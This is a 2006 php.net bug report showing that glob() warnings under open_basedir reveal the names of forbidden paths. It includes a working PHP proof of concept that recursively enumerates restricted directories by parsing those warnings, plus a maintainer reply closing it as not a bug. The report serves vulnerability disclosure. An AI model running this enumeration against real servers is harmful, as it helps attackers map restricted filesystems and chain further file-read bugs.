php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #39339 Bug in warning message when glob() function access to unallowed path.
Submitted: 2006-11-01 22:30 UTC Modified: 2006-11-03 21:22 UTC
From: anton dot kirsanov at gmail dot com Assigned:
Status: Not a bug Package: Safe Mode/open_basedir
PHP Version: 5.1.6 OS: ALL
Private report: No CVE-ID: None
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If this is not your bug, you can add a comment by following this link.
If this is your bug, but you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: anton dot kirsanov at gmail dot com
New email:
PHP Version: OS:

 

 [2006-11-01 22:30 UTC] anton dot kirsanov at gmail dot com
Description:
------------
When open_basedir is enabled, glob() function don`t show files in unallowed directories, however in warning message present file or directory name that access is denied. 
If you recursive parse a warning messages for extract pathes, you a get listing of unallowed directories (see POC code). 

I`m, tested this bug on PHP 5.1.6 and 4.4.4, everywhere the result is equal. 

Reproduce code:
---------------
<?php
	// -----------------------------------------------------
	// POC by Kirsanov Anton ( anton.kirsanov[at]gmail.com )
	// 
	// Description:
	// Bug in warning message for glob() function allow show listing unallowed directories when open_basedir is enabled.
        //
	// Risk:
	// Possible directory listing, when open_basedir is enabled.
	// Testing on PHP 4.4.4, 5.1.6.

	
	error_reporting(E_ALL); 
	ini_set("display_errors", 0); 
	ini_set("track_errors", 1); 

	if(!ini_get('open_basedir'))	
		die('open_basedir not present');

	$chars = "._-1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
	$z = array();

	get_c("/", $z);

        // show contents of root directory
	print_r($z);

	function get_c($path, &$o)
	{
		global $chars;
		for($i=0; $i < strlen($chars); $i++)
		{
			$p = $path . $chars[$i];
			$r = glob($p . "*");
			if(!$r && $php_errormsg)
			{
				if((	preg_match("/open\_basedir restriction in effect\. File\((.*)\) is/iU", $php_errormsg, $t) ||
					preg_match("/is not allowed to access (.*) owned/iU", $php_errormsg, $t)) && !$o[$t[1]])
				{
					$o[$t[1]] = $t[2];					get_c($p, $o);
				}
			}
		}
	}
?>

Expected result:
----------------
<?php
glob("/*");
?>

Warning: glob(): open_basedir restriction in effect.
is not allowed to access (/) owned ...


Actual result:
--------------
<?php
glob("/*");
?>

----
Warning: glob(): open_basedir restriction in effect.
is not allowed to access (/bin/) owned ...
----

Warning message has been disclose path - /bin/

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2006-11-03 19:40 UTC] iliaa@php.net
Thank you for taking the time to write to us, but this is not
a bug. Please double-check the documentation available at
http://www.php.net/manual/ and the instructions on how to report
a bug at http://bugs.php.net/how-to-report.php

Everytime PHP fails to open a file due to safe_mode/
open_basedir it returns an error saying cannot open so & so 
due to safe_mode. 

You don't gain the ability to write to files and/or open them, 
so there is no security issue here.
 [2006-11-03 21:22 UTC] anton dot kirsanov at gmail dot com
sorry, this a bug. 
if i know a fullpath to files in unallowed directories, i`m must used a many others php bugs (some curl bug, zlib compress file read bug) for read unallowed files. this a design bug in security architecture.
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Thu Mar 28 18:01:29 2024 UTC